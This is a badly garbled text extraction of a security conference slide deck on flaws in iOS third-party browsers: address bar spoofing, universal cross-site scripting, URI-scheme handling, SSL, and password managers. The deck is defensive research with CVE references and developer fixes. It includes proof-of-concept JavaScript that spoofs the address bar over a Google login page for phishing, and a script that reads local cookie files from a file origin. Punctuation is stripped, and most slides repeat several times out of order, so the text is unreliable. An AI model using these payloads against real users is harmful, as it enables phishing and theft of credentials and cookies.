bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
UIWebView APIbull stringByEvaluatingJavaScriptFromString
in the origin of currently loaded requestmainDocumentURL
No access to subframesfrom other domain than
the top document
httpexamplecom
httphiddentld
UIWebView amp WKWebView
JavaScript used to
implement browser features
and to override native functions to bridge them with Objective-C code
UIWebView amp WKWebView
UIWebViewDelegate
bull webViewshouldStartLoadWithRequestnavigationType
bull webViewDidStartLoad
bull webViewDidFinishLoad
bull webViewdidFailLoadWithError
UIWebView amp WKWebView
iOS8 beta WKWebViewbull configurationpreferences
bull configurationuserContentController
bull navigationDelegate
bull UIDelegate
bull URL (KVO)
bull hasOnlySecureContent (KVO)
UIWebView amp WKWebView
Bolted-on by the browsersbull Address bar
bull Multiple tabs
bull Downloads
bull Support for untrusted SSL certificates
bull Autocomplete amp password manager
bull hellip and many more features (safety ratings malware protection cloud integration hellip)
UIWebView amp WKWebView
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
JavaScript used to
implement browser features
and to override native functions to bridge them with Objective-C code
UIWebView amp WKWebView
UIWebViewDelegate
bull webViewshouldStartLoadWithRequestnavigationType
bull webViewDidStartLoad
bull webViewDidFinishLoad
bull webViewdidFailLoadWithError
UIWebView amp WKWebView
iOS8 beta WKWebViewbull configurationpreferences
bull configurationuserContentController
bull navigationDelegate
bull UIDelegate
bull URL (KVO)
bull hasOnlySecureContent (KVO)
UIWebView amp WKWebView
Bolted-on by the browsersbull Address bar
bull Multiple tabs
bull Downloads
bull Support for untrusted SSL certificates
bull Autocomplete amp password manager
bull hellip and many more features (safety ratings malware protection cloud integration hellip)
UIWebView amp WKWebView
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
UIWebViewDelegate
bull webViewshouldStartLoadWithRequestnavigationType
bull webViewDidStartLoad
bull webViewDidFinishLoad
bull webViewdidFailLoadWithError
UIWebView amp WKWebView
iOS8 beta WKWebViewbull configurationpreferences
bull configurationuserContentController
bull navigationDelegate
bull UIDelegate
bull URL (KVO)
bull hasOnlySecureContent (KVO)
UIWebView amp WKWebView
Bolted-on by the browsersbull Address bar
bull Multiple tabs
bull Downloads
bull Support for untrusted SSL certificates
bull Autocomplete amp password manager
bull hellip and many more features (safety ratings malware protection cloud integration hellip)
UIWebView amp WKWebView
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
